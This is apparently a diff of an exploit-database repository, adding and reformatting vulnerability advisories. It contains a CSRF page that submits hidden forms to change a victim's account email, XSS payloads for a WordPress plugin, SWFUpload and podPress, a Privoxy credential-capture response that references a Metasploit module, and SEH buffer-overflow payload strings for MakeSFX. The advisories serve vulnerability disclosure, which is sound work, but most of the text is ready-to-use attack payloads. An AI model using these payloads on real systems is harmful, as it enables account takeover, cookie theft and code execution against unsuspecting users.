+ ifr.setAttribute('height', '0');
+ document.body.appendChild(ifr);
+}
+CSRF1();
+setTimeout(CSRF2,1000);
+}
+function CSRF1() {
+window.frames["csrf1"].document.body.innerHTML = '<form name="hack"
+action="http://www.example.com/account"; method="post">n<input type="hidden"
+name="handle" value="test">n<input type="hidden" name="email"
+value="email () attacker com">n<input type="hidden" name="messages"
+value="1">n<input type="hidden" name="mailings" value="1">n<input
+type="hidden" name="field_1" value="test">n<input type="hidden"
+name="field_2" value="test">n<input type="hidden" name="field_3"
+value="test">n<input type="hidden" name="dosaveprofile"
+value="1">n</form>';
+window.frames["csrf1"].document.hack.submit();
+}
+function CSRF2() {
+window.frames["csrf2"].document.body.innerHTML = '<form name="hack"
+action="http://www.example.com/attack.php"; method="post">n<input type="hidden"
+name="do" value="1">n</form>';
+window.frames["csrf2"].document.hack.submit();
+}
+</script>
+</body>
+</html>
+

platforms/php/webapps/38373.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58415/info
+
+The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 
+
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
+alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
+</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 

platforms/php/webapps/38374.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/58417/info
+
+SWFUpload is prone to multiple cross-site scripting and content spoofing vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Content spoofing:
+
+http://www.example.com/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
+
+Cross-site scripting:
+
+http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E 

platforms/php/webapps/38375.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58418/info
+
+Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/public/error.php?warning=<XSS injection> 

platforms/php/webapps/38376.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58421/info
+
+The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+podPress 8.8.10.13 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}// 

platforms/php/webapps/38377.txt

@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/58425/info
+
+Privoxy is prone to multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.
+
+Privoxy 3.0.20 is affected; other versions may also be vulnerable. 
+
+Response Code (current).: 407
+
+Response Headers (as seen by your browser).:
+
+HTTP/1.1 407 Proxy Authentication Required
+Date: Mon, 11 Mar 2013 17:01:59 GMT
+Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
+Proxy-Authenticate: Basic
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 571
+Keep-Alive: timeout=15, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+Request Headers (as seen by the remote website)
+
+Host: c22.cc
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://www.example.com/
+Connection: keep-alive

platforms/windows/local/38362.py

@@ -47,20 +47,14 @@ makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
 
 etc...
 
-The '/title' argument when supplied an overly long payload will overwrite
-NSEH & SEH exception handlers
-causing buffer overflow, we can then execute our aribitrary shellcode. I
-have seen some applications using
-MakeSFX.exe from .bat files for some automation purposes, if the local .bat
-file is replaced by malicious
+The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers
+causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using
+MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious
 one attackers can cause mayhem on the system.
 
-Both versions from 2001 & 2009 are vulnerable but exploit setup will be off
-by 20 bytes.
-punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
-v1.44 (Dec 10 2009)
-punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
-v1.44 (Mar 19 2001)
+Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes.
+punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009)
+punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001)
 
 
 POC exploit code(s):
@@ -68,10 +62,8 @@ POC exploit code(s):
 
 We will exploit MakeSFX v1.44 (Mar 19 2001).
 
-I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH,
-Rebase all set to False, but it contains null 0x00.
-So no suitable SEH instruction address avail, I will instead have to use
-mona.py to look for POP,POP,RET instruction
+I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00.
+So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction
 in outside modules and we find some...
 
 e.g.
@@ -129,8 +121,7 @@ Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
-the author. The author is not responsible for any misuse of the information
-contained
+the author. The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 

platforms/windows/remote/22142.c

@@ -1,6 +1,6 @@
-source: http://www.securityfocus.com/bid/6582/info
+// source: http://www.securityfocus.com/bid/6582/info
 
-It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input. This could result in denial of service, or code execution. 
+// It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input. This could result in denial of service, or code execution. 
 
 /*****************************************************************
   * hoagie_adminmod_client.c

platforms/windows/remote/22966.c

@@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/8299/info
+// source: http://www.securityfocus.com/bid/8299/info
 
-Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.
+// Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.
 
-The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.
+// The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.
 
 /*
  *            m00 Security presents